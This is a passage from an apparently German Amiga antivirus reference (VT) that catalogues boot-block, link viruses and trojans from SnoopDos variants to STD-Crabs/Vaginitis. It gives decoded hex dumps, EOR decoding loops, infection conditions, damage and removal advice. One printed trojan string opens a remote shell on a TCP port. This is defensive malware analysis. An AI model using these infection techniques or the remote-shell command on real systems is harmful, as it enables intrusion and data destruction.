  5096.            - jsr -xy(a6) wird gefunden  ( max. loop $7FFF )
  5097.              wird ersetzt durch bsr Virus
  5098.              oder
  5099.            - jmp -xy(a6) wird gefunden  ( max. loop $7FFF )
  5100.              wird ersetzt durch bra Virus
  5101.              oder
  5102.            - einer der beiden Befehle steht genau am Ende des 1. Hunks.
  5103.              Dann wird NOPNOP geschrieben.
  5104.              VT versucht das Linkteil auszubauen. Aber: Bei dem NOP-
  5105.              Sonderfall ist es NICHT mehr moeglich festzustellen, ob der
  5106.              Ursprung jsr oder jmp war. VT nimmt JMP, da es in diesem
  5107.              Hunk ja nicht mehr weitergeht.
  5108.          Das Teil meldet sich nicht.
  5109.          Hinweis3:
  5110.          Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit
  5111.          dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen
  5112.          wird dadurch geringer.
  5113.          Hinweis4:
  5114.          Eine Syquest wurde in 20 Minuten total verseucht. Die Syquest
  5115.          hat dann beim Booten in der startup-sequence (assign usw.) mit
  5116.          dem Reboot-Req. abgebrochen.
  5117.  
  5118.  
  5119.    - SNK-Virus   File  siehe bei PHANTOM-Virus
  5120.  
  5121.    - SnoopDos1.6-Virus  Einbruchsprogramm in AmiExpress
  5122.          Von der Definition kein Virus, da keine Vermehrungsroutine ge-
  5123.          funden wurde.
  5124.          gefunden in: SNOOPD16.LHA  35444
  5125.          Snoopdos-Laenge: 11312 Bytes    Orig.SnoopDos1.5 : 10540 Bytes
  5126.          Es wurde SD1.5 verwendet und ein neuer Hunk als 1. angehaengt.
  5127.          Die Hunkanzahl erhoeht sich von 3 auf 4. Der neue 1. Hunk
  5128.          ist codiert mit:
  5129.                     loop:  move.w #$2d1,d2
  5130.                            eor.b d2,(a2)+
  5131.                            dbf d2,loop
  5132.          Nach Decodierung ist zu lesen:
  5133.             4ED46172 702E6C69 62726172 79004242 NOarp.library.BB
  5134.             53004242 533A7573 65722E64 61746100 S.BBS:user.data.
  5135.             4242533A 75736572 2E6B6579 7300002A BBS:user.keys..*
  5136.             4242533A 4E6F6465 302F6C6F 676F6E2E BBS:Node0/logon.
  5137.             74787400 44455854 45520000 00000000 txt.DEXTER......
  5138.             00000000 00000000 00000000 00000000 ................
  5139.             00000052 45545552 4E000000 3D3E2046 ...RETURN...=> F
  5140.             414E5441 20434F4E 4E454354 20323030 ANTA CONNECT 200
  5141.             31203C3D 00000000 3034392D 34333133 1 <=....049-4313
  5142.             36333633 34000000 00FF0000 00005858 63634....y....XX
  5143.             58585858 58585800 008F0013 007570CC XXXXXXX......upI
  5144.  
  5145.         Empfehlung: Virus-File loeschen , logon loeschen und Orig.
  5146.             SnoopDos neu aufspielen. Keine Gefahr fuer Amiga-Be-
  5147.             nutzer ohne Mailbox.
  5148.         VT erkennt File: 23.10.92
  5149.         Hinweis 01.11.92:   gelesen im FIDO-Netz
  5150.         Laut Eddy Carroll (Prg. von Snoopdos) gibt es auch ein
  5151.         echtes SnoopDos 1.6, das allerdings nicht offiziell ver-
  5152.         breitet wurde. Das echte SD1.6 (hab ich nicht) soll bei
  5153.         Aufruf von version den Versions-Text ausgeben. Mein Test:
  5154.         Das SnoopDos1.6-Virus enthaelt den Text NICHT.
  5155.  
  5156.    - SnoopDos-JEFF-Virus  File   Laenge: 15336 Bytes
  5157.         Von der Definition ein trojanisches Pferd
  5158.         Jeff Butonic entfernt: 11568 Bytes
  5159.         A4000/40 : nur ohne cache
  5160.         Mit Hunklab wurde an SnoopDos ein Jeff-Butonic V4.55 ge-
  5161.         linkt. (JEFF siehe oben)
  5162.         Ob das SnoopDos-File V1.9 echt ist, kann ich nicht ent-
  5163.         scheiden.
  5164.         Mir ist die Version 1.9 (mein Kenntnisstand: Aug.93)
  5165.         nicht bekannt. Es koennte also jemand die Versionsnummer
  5166.         mit einem Monitor erhoeht haben. SnoopDos ist aber sauber.
  5167.            ff84584f 4cdf4080 4e752456 45523a20 ..XOL.@.Nu$VER:
  5168.            536e6f6f 70446f73 20312e39 20283132 SnoopDos 1.9 (12
  5169.            2e30352e 39332900 50726f63 65737320 .05.93).Process
  5170.            6e616d65 20202020 20202020 20204675 name          Fu
  5171.         VT erkennt bei File-Test: SnoopDos-JEFF
  5172.         VT erkennt im Speicher  :
  5173.          - Sie haben sich NICHT an die Anweisungen gehalten und
  5174.            SnoopDos NICHT abgeschaltet vor Benutzung von VT:
  5175.               "SnoopD.u.anderesPrg ist im Speicher"
  5176.          - Sie haben SnoopDos vorher abgeschaltet:
  5177.               "JEFF BUTONIC V4.55 ist im Speicher"
  5178.  
  5179.    - SnoopDos-Saddam-Virus  File   Laenge: 13776 Bytes
  5180.         Von der Definition ein trojanisches Pferd
  5181.         Saddam-Clone entfernt: 11568 Bytes
  5182.         Mit Hunklab wurde an SnoopDos ein Saddam-Clone-4711 ge-
  5183.         linkt. (Saddam-Clone siehe oben)
  5184.         Ob das SnoopDos-File V2.1 echt ist, kann ich nicht ent-
  5185.         scheiden. Aber unwahrscheinlich, da gleiche Laenge wie V1.9.
  5186.         Mir ist die Version 2.1 (mein Kenntnisstand: Aug.93)
  5187.         nicht bekannt. Es koennte also jemand die Versionsnummer
  5188.         mit einem Monitor erhoeht haben. SnoopDos ist aber sauber.
  5189.            4e752456 45523a20 536e6f6f 70446f73 Nu$VER: SnoopDos
  5190.            20322e31 20283232 2e30372e 39332900  2.1 (22.07.93).
  5191.        Verhalten:
  5192.          SnoopDos V2.1 hab ich bei verseuchtem File NIE auf dem Bild-
  5193.          schirm gesehen.
  5194.         KS2.04:
  5195.          Das File stuerzt mit GURU 3 ab und nach Tastatur-Reset ist
  5196.          der Speicher sauber.
  5197.         KS1.3:
  5198.          Das File wird geladen und dann tut sich NICHTS mehr. Snoop-
  5199.          Dos V2.1 ist bei mir nicht erschienen.
  5200.          Tastatureingaben erscheinen auf dem Bildschirm, werden aber
  5201.          nicht ausgefuehrt.
  5202.          UND JETZT KOMMT DAS SCHLIMME:
  5203.          Nach einem Tastatur-Reset arbeitet der SADDAM-Disk-Validator
  5204.          im Speicher (man erinnere sich: Saddam hat eine Cold-Reboot-
  5205.          Routine, die AUCH mit FastMem arbeitet). Das Kreset-Prg im
  5206.          Unterverzeichnis von VT-Schutz hilft aber auch dagegen.
  5207.  
  5208.    - SOFIA Virus   BB   GYROS-Clone  s.o.
  5209.  
  5210.    - Sonja VIRUS   BB      KS2.04: NEIN
  5211.     Fordert trackdisk.device: JA
  5212.     BeginIo, KickTag, KickCheckSum
  5213.     Codiert mit Wert aus $DFF007
  5214.     DecodierRoutine: eor.b d0,-(a1)
  5215.     Im Speicher findet man dann z.B.:
  5216.                     00007472 61636B64 69736B2E      ..trackdisk.
  5217.            64657669 63650014 49742773 20536F6E device..It's Son
  5218.            6A612056 49525553 21212100 28632939 ja VIRUS!!!.(c)9
  5219.            31206279 204D4300                   1 by MC.
  5220.  
  5221.     Vermehrung: als BB
  5222.     Schaeden:
  5223.     Sobald eine Zaehlzelle den Wert $14 erreicht hat, wird eine
  5224.         Format-Routine aufgerufen. Formatiert wird Track 2, 4, 6 usw.
  5225.         (Mal was Neues). Dann wird nach Block #880 ein neuer Rootblock
  5226.         geschrieben. RootBlockAuszug:
  5227.          1A0: 00000000 00000000 00000000 00000000 ................
  5228.          1B0: 14497427 7320536F 6E6A6120 56495255 .It's Sonja VIRU
  5229.          1C0: 53212121 00286329 39312062 79204D43 S!!!.(c)91 by MC
  5230.          1D0: 00000000 00000000 00000000 00000000 ................
  5231.  
  5232.         Am Schluss wird nach $FC0000 (reset) gesprungen. Die Disk
  5233.         ist unbrauchbar. Es ist NICHTS mehr zu retten. Da der Disk-
  5234.         name durch das Byte 1B0 = $14 in der Laenge begrenzt wird,
  5235.         erfolgt die Ausgabe nur bis zum letzten ! .
  5236.  
  5237.         BootBlock-Erkennung mit VT getestet:  23.09.92
  5238.         Speicher-Erkennung mit VT getestet :  23.09.92
  5239.  
  5240.    - SPEEDER-Virus  Zerstoerungsfile      anderer und richtiger
  5241.         Name: Descriptor-Virus  siehe oben
  5242.  
  5243.  
  5244.    - SPEEDUP-Inst.   File
  5245.         Filename: SPEEDUP.EXE
  5246.         Laenge: 92576 Bytes
  5247.         Soll das Linkteil im Speicher verankern.
  5248.         Sehr viel Platz in diesem File ist Muell, der nie erreicht wird.
  5249.         Vt bietet Loeschen an.
  5250.  
  5251.    - SPEEDUP-Virus   Link
  5252.         Der Name wurde von dem Installerteil uebernommen, da sich im
  5253.         Linkteil nichts angeboten hat.
  5254.         Verbogene Vektoren: LoadSeg
  5255.               und falls pmbsonline.lib vorhanden, -$78(dieser lib)
  5256.         Diese Lib kenne ich nicht. Also kann ich zu den Auswirkungen,
  5257.         keine Aussage treffen.
  5258.         Link hinter den ersten Hunk
  5259.         Fileverlaengerung immer #1244 Bytes
  5260.         Linkteil nicht codiert
  5261.         Im Linkteil ist zu lesen:
  5262.           2a40d3fc ffffff6c 22510ca9 4afc4afd *@.....l"Q..J.J.
  5263.             ;.....                   ^^^^^^^^
  5264.           03d0706d 62736f6e 6c696e65 2e6c6962 ..pmbsonline.lib
  5265.           72617279 0000646f 732e6c69 62726172 rary..dos.librar
  5266.             ;.....
  5267.           00000000 00000000 7fde3ba3 000003f2 .........;.....
  5268.                             ^^^^^^^^
  5269.         Verankerung im Speicher:
  5270.          Ueber Loadseg
  5271.          Dabei wird ueberprueft, ob sich das Teil schon im Speicher
  5272.          (4afc4afd) befindet.
  5273.         FileLink:
  5274.          Das Teil enthaelt eine Zaehlzelle, damit nicht bei jedem
  5275.          LoadSeg-Aufruf ein Linkversuch unternommen wird.
  5276.          Test ob File schon verseucht (7fde3ba3)
  5277.          Medium validated
  5278.          Mind. 5 Block frei
  5279.          Filename enthaelt nicht "."
  5280.          Kein Test auf Filelaenge oder 3E9-Hunk
  5281.          Es wird im Original-Hunk ein Bra ($6000) gesucht. Dabei muss
  5282.          das BRA in einem Loop mind. $13+1 mal gefunden werden, sonst
  5283.          findet keine Veraenderung statt. Diese Bra darf nicht weiter
  5284.          als $7FFE vom Linkteilbeginn entfernt sein. Dieser BRA-Befehl
  5285.          wird dann mit BRA Virusteil ueberschrieben.
  5286.         VT bietet Ausbau an
  5287.  
  5288.  
  5289.    - Sphinx-BB   SCA-Clone s.o.
  5290.  
  5291.    - SS Virus BB  Cool immer $7C078  immer ab $7C000
  5292.          Bei mir mit KS2.04 nach Reset kein neuboot von Disk.
  5293.          Unter KS1.3 werden nach dem Reset 2 Interrupts installiert.
  5294.             Nr. 3 = Ports = $7C1D6 = SS.install
  5295.             Nr. 5 = VERTB = $7C1F8 = SS.greetings
  5296.          VT entfernt beim loeschen die Namen und setzt die Codezeiger
  5297.             auf 0 mit RemIntServer. Also keine Gefahr mehr. vgl. VT =
  5298.             Listen = IntVec
  5299.          Sobald die Zaehlzelle den Wert #$500 erreicht hat wird eine
  5300.          Graphikroutine angesprungen:
  5301.          schwarzer Hintergrund, helle Schrift
  5302.          Hakenkreuz,SS-Rune,Hakenkreuz und dann
  5303.             your computer is infected by SS-Virus!
  5304.          Danach ist ein Reset notwendig, da das VirusPrg. sich in einer
  5305.          Endlosschleife befindet.
  5306.          Der BB ist codiert mit eor.l d0,(a0)+
  5307.          Von der Definition handelt es sich nicht um einen BB-Virus,
  5308.          da keine Vermehrungsroutine gefunden wurde.
  5309.          siehe auch MOSH, HEIL-Virus
  5310.  
  5311.    - STARCOMReturn-Virus   BB   richtig: The Return of STARCOM
  5312.          anderer Name: STARCOM 2
  5313.          LAMER 4 -Clone  siehe oben
  5314.          Es wurden nur Texte geaendert. Decodiert ist im Speicher zu
  5315.          lesen:
  5316.            51c8fffc 4e757472 61636b64 69736b2e Q...Nutrackdisk.
  5317.            64657669 63650054 68652052 65747572 device.The Retur
  5318.            6e206f66 20535441 52434f4d 21212121 n of STARCOM!!!!
  5319.            21bfabcd 00fc0a78 00fe9c3e 0000a4e8 !......x...>....
  5320.          Eine Meisterleistung ist das Zerstoerungslangwort STC! . Es
  5321.          wurde dabei uebersehen, das das Original noch das Wort R!
  5322.          setzt oder war man nicht in der Lage, die Schleife zu aendern.
  5323.              Block:     350
  5324.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5325.            52215354 43215221 53544321 52215354 R!STC!R!STC!R!ST
  5326.                   ;......
  5327.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5328.            52215354 43215221 53544321 52212121 R!STC!R!STC!R!!!
  5329.          Sollte so ein Block in einem File liegen (BlockKette), so ist
  5330.          KEINE Rettung des Files moeglich. Tut mir leid.
  5331.  
  5332.  
  5333.    - STARCOM 1 Virus   CCCP-Clone siehe oben  also BB und Link
  5334.          KS1.3  ja
  5335.          KS2.04 ja
  5336.          Mehrfachlinks: ja
  5337.          Defekte Files: ja   (Hunkstruktur defekt nur loeschen moeglich)
  5338.          Eine Meisterleistung: NUR der ASCII-Text wurde geaendert:
  5339.           70004e75 53544152 434f4d21 21214df8 p.NuSTARCOM!!!M.
  5340.  
  5341.    - STARCOM 2 Virus  siehe bei STARCOMReturn-Virus
  5342.  
  5343.    - STARCOM 3 Virus  Byte Voyager 1 Clone  siehe oben  BB
  5344.          Eine Meisterleistung: NUR Text geaendert
  5345.          Decodiert ist zu lesen:
  5346.            fff64681 23410004 4cdf0303 4e751e54 ..F.#A..L...Nu.T
  5347.            68652052 4556454e 4745206f 66205354 he REVENGE of ST
  5348.            4152434f 4d202121 21000000 00000000 ARCOM !!!.......
  5349.          Schreibt auch in Bock 880 (nur bei Disk Root)
  5350.            Block:     880
  5351.          01b0: 1e546865 20524556 454e4745 206f6620 .The REVENGE of
  5352.          01c0: 53544152 434f4d20 21212100 00000000 STARCOM !!!.....
  5353.          Dies bewirkt bei Disk einen neuen Namen.
  5354.          Fordert Trackdisk.device NICHT
  5355.          Hinweis: Das Programm sichert den Bereich ab $7F000 NICHT.
  5356.          D.h. ein anderes Prg. z.B. VT kann genau an diese Stelle
  5357.          geladen werden. Da der verbogene KickTagzeiger in der Exec
  5358.          liegt und dieser Bereich ja geschuetzt ist, kann es zur Aus-
  5359.          gabe "unbekanntes Prg" oder "ResStruc ungerade" kommen. Mit
  5360.          5 MB wurde dieses Virusteil im Speicher richtig erkannt, aber
  5361.          natuerlich bleibt unter KS1.3 bei dieser Speichergroesse, nach
  5362.          einem RESET das Prg. nicht erhalten und eine Vermehrung ist
  5363.          ueber DoIo nicht moeglich.
  5364.  
  5365.    - STARCOM 4 Virus   BB
  5366.          LAMER 6 -Clone  siehe oben
  5367.          Es wurden nur Texte geaendert. Decodiert ist im Speicher zu
  5368.          lesen:
  5369.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  5370.            00412074 6f756368 206f6620 53544152 .A touch of STAR
  5371.            434f4d20 76697275 73212000 b800abcd COM virus! .....
  5372.          Eine Meisterleistung ist das Zerstoerungslangwort STC! . Es
  5373.          wurde dabei uebersehen, das das Original noch das Wort R!
  5374.          setzt oder war man nicht in der Lage, die Schleife zu aendern.
  5375.              Block:     480
  5376.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5377.            52215354 43215221 53544321 52215354 R!STC!R!STC!R!ST
  5378.                   ;......
  5379.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5380.            52215354 43215221 53544321 52212121 R!STC!R!STC!R!!!
  5381.          Sollte so ein Block in einem File liegen (BlockKette), so ist
  5382.          KEINE Rettung des Files moeglich. Tut mir leid.
  5383.  
  5384.    - STARCOM 5 Virus   BB  boot-aids Virus Clone  siehe oben
  5385.          Im BB und Speicher ist uncodiert zu lesen:
  5386.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  5387.            00005468 65205354 4152434f 4d204176 ..The STARCOM Av
  5388.            656e6765 7220312e 30302021 00010000 enger 1.00 !....
  5389.          Vermehrung: BB
  5390.          Schaeden: soll STC!aw in einen Block schreiben und damit
  5391.          das File unbrauchbar machen. KEINE Rettung moeglich.
  5392.          Besonderheit: In Boot-aids existiert eine Routine:
  5393.                      cmpi.b #8,3(a0)
  5394.                      bne.s $FEEF6
  5395.          Dies bewirkt, dass nur Datenbloecke zerstoert werden koen-
  5396.          nen. Diese Routine wird bei Starcom 5 abgeschaltet, da
  5397.          bne.s durch ein NOP ersetzt wurde.
  5398.  
  5399.    - STARCOM 6 Virus  BB  Forpib-Clone siehe oben
  5400.          Eine Meisterleistung: nur Text geaendert im BB.
  5401.            2020202a 2a2a2054 68652053 74617263    *** The Starc
  5402.            6f6d2042 4c41434b 4f555421 20286329 om BLACKOUT! (c)
  5403.            20313939 33202a2a 2a202020 20202020  1993 ***
  5404.  
  5405.    - STARFIRE/NorthStar 1   anderer Name  BlackStar
  5406.          Cool, DoIo, im Speicher immer ab $7ec00, VersionsNr: 1
  5407.          testet nicht auf SystemZ, nur auf SCA, ByteBandit = DisplayAlert
  5408.          Vermehrung: ueber BB
  5409.          Im BB lesbar:
  5410.          Virus detected on this disk  usw.
  5411.          Reset,WriteProt OFF (bei NorthStar2 nicht vorhanden)
  5412.          Clones: East-Star
  5413.  
  5414.    - STARFIRE/NorthStar 2 = OldNorthStar  ????
  5415.          Cool, DoIo, im Speicher immer ab $7ec00, VersionsNr: 2
  5416.          testet auf SCA, ByteBandit, SystemZ, NorthStar1, Folge=DisplayAlert
  5417.          Vermehrung: ueber BB
  5418.          Im BB lesbar:
  5419.          VIRUS detected on this disk  usw.
  5420.          My AntiVirus is better!    (bei NorthStar1 nicht vorhanden)
  5421.          Clones: z.B. Payday.BB
  5422.  
  5423.    - Starfire2    nur Block 0, sehr viel Text: The Virusbusters North Star
  5424.          Es ist kein Virus.
  5425.  
  5426.    - STARLIGHT   File  2600   BRET HAWNES - Clone (siehe oben)
  5427.          KS2.04 : ja
  5428.          Laenge 8 Bytes weniger als Original, weil 03EC-Hunk ent-
  5429.          fernt wurde.  Vermehrt sich das Teil, so ist die Laenge
  5430.          wieder 2608, da der 03EC-Hunk vom Virus angelegt wird.
  5431.          Wird von VT nur als Bret-Virus erkannt.
  5432.          Der lesbare Text (nicht der codierte) wurde geaendert.
  5433.          Am Fileanfang:
  5434.            0000027D 60000018 53544152 4C494748 ...}`...STARLIGH
  5435.            54203120 50524F44 55435449 4F4E2C79 T 1 PRODUCTION,y
  5436.          Am Fileende:
  5437.            F9526100 FED66000 FA02444F 20594F55          .DO YOU
  5438.            204C494B 45204D59 20464952 53542056  LIKE MY FIRST V
  5439.            49525553 203F2044 4F4E4520 4259204D IRUS ? DONE BY M
  5440.            43444A2D 4444454E 49545921 20323130 CDJ-DDENITY! 210
  5441.            32393000 00000000 000003F2 000003EB 290....
  5442.          Wird vielleicht von anderen AntivirusPrg als Starlight
  5443.          - Virus erkannt. VT bleibt bei BRET HAWNES.
  5444.  
  5445.  
  5446.    - STARLIGHT   BB     Warhawk-Clone  s.u.
  5447.          Nur Text geaendert.
  5448.  
  5449.    - STARLIGHT II  BB   MicroSystems-Clone s.o.
  5450.          Nur Text geaendert.
  5451.  
  5452.    - STD-Crabs1-Install  Installer
  5453.       Archivename: mdlx09c.lha (Fremdaussage, hab ich nicht)
  5454.       Filename:    MiamiDx.beta 439724 Bytes
  5455.       Warum Installer
  5456.       - Zerstoerungs-NOP fehlt
  5457.       - Linkteil ist kuerzer als nach Linkcode (mind. C1) moeglich
  5458.       - Linkteil wird nicht ueber NOP erreicht, sondern mit BRA.L
  5459.         gleich am Fileanfang angesprungen.
  5460.       Loeschen Sie bitte das Teil
  5461.       Rest siehe STD-Crabs1-LVirus 
  5462.       Nachtrag 99-02-09: Erschienen ist MiamiDx09d.beta
  5463.  
  5464.    - STD-Crabs1-LVirus    Linkvirus
  5465.       Fileverlaengerung: #772-832 Bytes
  5466.       Nicht Resetfest
  5467.       Ab KS2.04
  5468.       Verbogene Vektoren: LoadSeg
  5469.       Zerstoerung: In Abhaengigkeit von $DFF009 wird ein NOP in
  5470.          das File geschrieben. Da Ursprungswert und -Stelle NICHT
  5471.          gerettet werden, ist ein Ausbau NICHT sinnvoll. Einige ver-
  5472.          seuchte Files laufen. Die Mehrheit erzeugt einen Guru. VT
  5473.          bietet nur Loeschen an.
  5474.       dir vorher                      nachher
  5475.       0f8: 70012b40 fe44602c p.+@.D`, 0f8: 70012b40 fe444e71 p.+@.DNq
  5476.                         ^^^^                            ^^^^
  5477.       delete vorher                   nachher
  5478.       080: 2c4a4eae fce22f40 ,JN.../@ 080: 4e714eae fce22f40 NqN.../@
  5479.            ^^^^                            ^^^^
  5480.       Decodiert ist im Linkteil zu lesen:
  5481.                                536e 6f6f7044           SnoopD
  5482.          6f732053 7570706f 72742050 726f6365 os Support Proce
  5483.          73730053 54442070 72657365 6e747320 ss.STD presents
  5484.          2d2d2d20 43726162 73202331 202d2049 --- Crabs #1 - I
  5485.          74636879 20596574 3f00              tchy Yet?.
  5486.       Speicherverankerung:
  5487.            - FindTask verbogen - Ende
  5488.            - Examine verbogen - Ende
  5489.            - SnoopDos im Speicher - CCR wird veraendert
  5490.            - Loadseg wird verbogen
  5491.       Linkvorgang:
  5492.            - mit LoadSeg hinter den 1. Hunk
  5493.            - Laenge variabel in Abhaengigkeit von einer Zelle,
  5494.              die immer ihren Wert aendert (Addition)
  5495.            - Codierung immer neu mit EOR und dieser Zelle mit
  5496.              Wertaenderung
  5497.            - Findtask nicht veraendert
  5498.            - Examine nicht veraendert
  5499.            - Filename enthaelt nicht "." oder "-"
  5500.            - Medium validated
  5501.            - 3 Block frei
  5502.            - File groesser #1024 Bytes
  5503.            - File kleiner KEINE Grenze
  5504.            - Suche nach RTS nur im letzten Langwort des 1.Hunks und
  5505.              Ersetzen durch NOP
  5506.            - In Abhaengigkeit von $DFF009 ein NOP in den 1.Hunk
  5507.              schreiben.
  5508.            - FileDate zurueckschreiben
  5509.       Empfehlung: Falls Sie gelinkte Files finden und Originalfiles
  5510.              zurueckspielen muessen.
  5511.              VTprefs/Filetest-Requester nach df0:test
  5512.              Klicke alle Requester.
  5513.              Sie haben danach eine Liste mit allen Files, die Sie
  5514.              neu aufspielen muessen.
  5515.          VT sollte das Teil am File und im Speicher finden.
  5516.  
  5517.    - STD-Vag1-Install  Installer
  5518.       Filename:  CED417 #169872 Bytes
  5519.       Springt vom Fileanfang in das Linkteil
  5520.       Linkteil ist mit EOR codiert
  5521.       Linkteil soll an c:mount gelinkt werden (nur an dieses File)
  5522.       Loeschen Sie bitte das CED417-File
  5523.       Ein sauberer Ausbau ist NICHT moeglich, da der Originalzu-
  5524.       stand am Fileanfang mir unbekannt ist.
  5525.       Rest siehe STD-Vag1-Trojan
  5526.  
  5527.    - STD-Vag1-Trojan
  5528.       Fileverlaengerung: immer #800 Bytes
  5529.       Filename: nur c:mount
  5530.       Nicht Resetfest
  5531.       Ab KS2.04
  5532.       Verbogene Vektoren: LoadSeg
  5533.       Decodiert ist im Linkteil zu lesen:    
  5534.                        536e 6f6f7044 6f732053       SnoopDos S
  5535.           7570706f 72742050 726f6365 73730043 upport Process.C
  5536.           3a4d6f75 6e740072 756e203e 4e494c3a :Mount.run >NIL:
  5537.           206e6577 7368656c 6c205443 50003232  newshell TCP.22
  5538.           32370000 53544420 70726573 656e7473 27..STD presents
  5539.           202d2056 6167696e 69746973 20233120  - Vaginitis #1
  5540.           2d2d2064 69727479 206d6f6c 6521     -- dirty mole!
  5541.       Speicherverankerung:
  5542.            - FindTask veraendert - Ende
  5543.            - Examine veraendert - Ende
  5544.            - SnoopDos im Speicher - CCR wird veraendert
  5545.            - Loadseg wird verbogen
  5546.       Linkvorgang:
  5547.            - hinter den 1. Hunk von mount
  5548.            - Codierung mit EOR
  5549.            - Findtask nicht veraendert
  5550.            - Examine nicht veraendert
  5551.            - Suche nach RTS nur im letzten Langwort des 1.Hunks und
  5552.              Ersetzen durch NOP (dadurch kein "100% richtiger" Aus-
  5553.              bau moeglich vgl. auch Fungus)
  5554.            - FileDate zurueckschreiben
  5555.       Schaden:
  5556.            - Suche TCP in DosList
  5557.            - Setze hinter TCP (s.o.) einen Doppelpunkt
  5558.            - DosExecute run >NIL: .....
  5559.            - Es soll also wahrscheinlich ein Fremdzugriff auf den
  5560.              Rechner ermoeglicht werden
  5561.       Vgl. auch alle anderen STD-Varianten und Fungus
  5562.  
  5563.    - STD-Vag2-Install  Installer
  5564.       Filename:  rexxkuang11.library 0.36 L: #31172 Bytes
  5565.       Springt im File mit BRA in das Linkteil
  5566.       Linkteil ist mit EOR codiert
  5567.       Linkteil soll an c:mount gelinkt werden (nur an dieses File)
  5568.       Loeschen Sie bitte die Lib
  5569.       Ein sauberer Ausbau ist NICHT moeglich, da der Originalzu-
  5570.       stand des Files mir unbekannt ist.
  5571.       Rest siehe STD-Vag2-Trojan
  5572.  
  5573.    - STD-Vag2-Trojan
  5574.       Fileverlaengerung: immer #800 Bytes
  5575.       Filename: nur c:mount
  5576.       Nicht Resetfest
  5577.       Ab KS2.04
  5578.       Verbogene Vektoren: LoadSeg
  5579.       Decodiert ist im Linkteil zu lesen: 
  5580.                             536e6f6f 70446f73         SnoopDos
  5581.           20537570 706f7274 2050726f 63657373  Support Process
  5582.           00433a4d 6f756e74 0072756e 203e4e49 .C:Mount.run >NI
  5583.           4c3a206e 65777368 656c6c20 54435000 L: newshell TCP.
  5584.           32353531 00005354 44207072 6573656e 2551..STD presen
  5585.           7473202d 20566167 696e6974 69732023 ts - Vaginitis #
  5586.           32202d2d 2066696c 74687920 77686f72 2 -- filthy whor
  5587.           6521                                e!
  5588.       Speicherverankerung:
  5589.            - FindTask veraendert - Ende
  5590.            - Examine veraendert - Ende
  5591.            - SnoopDos im Speicher - CCR wird veraendert
  5592.            - Loadseg wird verbogen
  5593.       Linkvorgang:
  5594.            - hinter den 1. Hunk von mount
  5595.            - Codierung mit EOR
  5596.            - Findtask nicht veraendert
  5597.            - Examine nicht veraendert
  5598.            - Suche nach RTS nur im letzten Langwort des 1.Hunks und
  5599.              Ersetzen durch NOP (dadurch kein "100% richtiger" Aus-
  5600.              bau moeglich vgl. auch Fungus)
  5601.            - FileDate zurueckschreiben
  5602.       Schaden:
  5603.            - Suche TCP in DosList
  5604.            - Setze hinter TCP (s.o.) einen Doppelpunkt
  5605.            - DosExecute run >NIL: .....
  5606.            - Es soll also wahrscheinlich ein Fremdzugriff auf den
  5607.              Rechner ermoeglicht werden
  5608.       Vgl. auch alle anderen STD-Varianten und Fungus
  5609.       Zum Nachdenken: eine neuere Trojanvariante (3) haengt an einer
  5610.          aelteren Libversion (0.27) und umgekehrt ????
  5611.              
  5612.    - STD-Vag3-Trojan
  5613.       Filename:  rexxkuang11.library 0.27 L: #26532 Bytes  
  5614.       Nicht Resetfest
  5615.       Ab KS2.04
  5616.       Verbogene Vektoren: KEINE
  5617.       Vermehrung: Nein  
  5618.       Decodiert mit EOR ist im Trojanteil zu lesen:
  5619.                    52554e20 3e4e494c 3a206e65     RUN >NIL: ne
  5620.           77736865 6c6c2074 63703a32 33333300 wshell tcp:2333.
  5621.              ;...
  5622.                             53544420 70726573         STD pres
  5623.           656e7473 20566167 696e6974 69732023 ents Vaginitis #
  5624.           33202d2d 2d206469 6420796f 75206669 3 --- did you fi
  5625.           6e642031 20616e64 20322079 65743f00 nd 1 and 2 yet?.
  5626.       Springt im File mit BRA in das Trojanteil 
  5627.       Schaden:
  5628.            - Holt sich die DosBase wahrscheinlich aus einer Lib
  5629.            - Suche TCP in DosList falls nein Ende
  5630.            - DosExecute run >NIL: .....
  5631.            - Es soll also wahrscheinlich ein Fremdzugriff auf den
  5632.              Rechner ermoeglicht werden
  5633.       Loeschen Sie bitte die Lib
  5634.       Vgl. auch alle anderen STD-Varianten
  5635.       Zum Nachdenken: eine neuere Trojanvariante (3) haengt an einer
  5636.          aelteren Libversion (0.27) und umgekehrt ????
  5637.  
  5638.  
  5639.    - Stockmarket-BBS   Filename: stock.rexx   Laenge: 74576 Bytes
  5640.          Nach meiner Meinung fuer Nicht-Mailbox-Spieler ungefaehrlich.
  5641.          VT bietet nur loeschen an.
  5642.          Schaeden: Kann ich nicht nachvollziehen. Deshalb ein Textauszug
  5643.          OHNE Garantie:
  5644.    -----------------------------------------------------------------------
  5645.    WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
  5646.    -----------------------------------------------------------------------
  5647.  I Just wanna inform all of you /X sysops, than a file -L-STOCK.LHA (a door
  5648.  game for /X) has a fucking BACKDOOR !!!!
  5649.  If you enter BUY option and write a number highest than possible (for
  5650.  example a number 20 or 100 or any more than allowed than your Upload Status
  5651.  will be restored to 0 !!!!! 0 bytes !!!!! All your uploads will be canceled!
  5652.  
  5653.  
  5654.    - Strange Atmosphere  Installer
  5655.         Bekannte Filenamen:
  5656.         Typ A :             db 3.03   Laenge: 76676 Bytes
  5657.         Im File ist zu lesen:
  5658.            00006462 2076332e 303320a9 31393936 ..db v3.03 .1996
  5659.            20446176 69642045 6b686f6c 6d2c2044  David Ekholm, D
  5660.         Ich gehe davon aus, dass es diese Version 3.03 im Original
  5661.         nicht gibt.
  5662.         Typ B :             IconX     Laenge:  6288 Bytes
  5663.         Im File ist zu lesen:
  5664.            4e750024 5645523a 2069636f 6e782033 Nu.$VER: iconx 3
  5665.            392e3820 2832302e 312e3932 2900646f 9.8 (20.1.92).do
  5666.         Ich gehe davon aus, dass es diese Version 39.8 im Original
  5667.         nicht gibt.
  5668.         VT bietet Loeschen an.
  5669.         Ablauf:
  5670.         Suche nach SnoopDos. (Taskname wird erst im Code zusammenge-
  5671.         setzt) . Falls gefunden ->Ende.
  5672.         Schreibe C:Assign   Laenge: 4488 Bytes
  5673.         Im File ist zu lesen:
  5674.            45532f53 00245645 523a2061 73736967 ES/S.$VER: assig
